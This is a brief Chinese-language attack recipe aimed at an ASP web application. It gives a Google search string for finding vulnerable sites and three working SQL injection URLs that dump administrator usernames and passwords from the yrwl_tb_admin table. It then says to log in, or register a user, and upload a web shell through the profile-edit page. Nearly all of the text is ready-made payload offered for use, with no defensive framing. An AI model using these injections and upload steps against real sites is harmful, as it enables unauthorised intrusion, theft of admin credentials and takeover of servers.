1.google搜索:inurl:"userinfo.asp?yhm="
2.注入exp:直接暴管理員密碼
/userinfo.asp?yhm='%20union%20select%201,2,3,yhm%2bchr(35)%2bpass,5,6,7,8,9,10,11,12,13,14,15%20from%20yrwl_tb_admin /ad.asp?ad='%20union%20select%201,2,3,4,5,6,7,8,yhm%2bchr(35)%2bpass%20from%20yrwl_tb_admin /bbs_bj.asp?id=11%20and%201=2%20union%20select%201,yhm%2bchr(35)%2bpass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20yrwl_tb_admin
3.進入後臺,在個人資料->修改個人信息 直接上傳大馬
或者 直接註冊一用戶,然後在個人資料->修改個人信息 直接上傳大馬